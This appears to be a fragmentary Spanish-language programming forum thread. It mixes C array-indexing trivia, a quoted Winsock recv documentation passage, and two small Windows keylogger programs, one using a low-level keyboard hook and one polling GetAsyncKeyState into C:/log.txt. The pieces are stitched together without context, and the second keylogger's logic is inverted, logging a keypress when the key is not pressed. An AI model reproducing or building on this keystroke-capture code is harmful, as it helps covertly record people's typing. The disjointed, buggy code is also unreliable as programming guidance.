Bueno yo le dije lo del operador y me dijo eso se como funciona mas no el por qué funciona así. No se que es lo que quiere escuchar y quedé con la duda.
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#include <stdio.h>
int arreglo[] = { 1, 2,3, 4, 5};
int main()
{
printf("%d\n", arreglo[3]);
printf("%d\n", 3[arreglo]);
return 0;
}
elem1[elem2]
*(elem1 + elem2)
CitarReturn value
If no error occurs, recv returns the number of bytes received and the buffer pointed to by the buf parameter will contain this data received. If the connection has been gracefully closed, the return value is zero.
Otherwise, a value of SOCKET_ERROR is returned, and a specific error code can be retrieved by calling WSAGetLastError.
#include <stdio.h>
#include <Windows.h>
HHOOK hKeyboard;
LRESULT CALLBACK keyboardproc(int nCode, WPARAM wParam, LPARAM lParam){
DWORD keyCode = ((KBDLLHOOKSTRUCT*)lParam)->vkCode;
switch(keyCode){
default:
printf("Tecla %c presionada!\n", keyCode);
}
return CallNextHookEx(hKeyboard, nCode, wParam, lParam);
}
int main(){
MSG msg;
hKeyboard = SetWindowsHookEx(WH_KEYBOARD_LL, keyboardproc, GetModuleHandle(0),0);
if(!hKeyboard)
return 0;
while(GetMessage(&msg, 0,0,0))
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}
return 0;
}
#include <fstream>
#include <iostream>
#include <Windows.h>
std::ofstream keylog;
int main(){
keylog.open("C:/log.txt", std::ios_base::app);
while(1){
if(!GetAsyncKeyState(0x41))
keylog << "Tecla A presionada" << std::endl;
Sleep(500);
}
keylog.close();
return 0;
}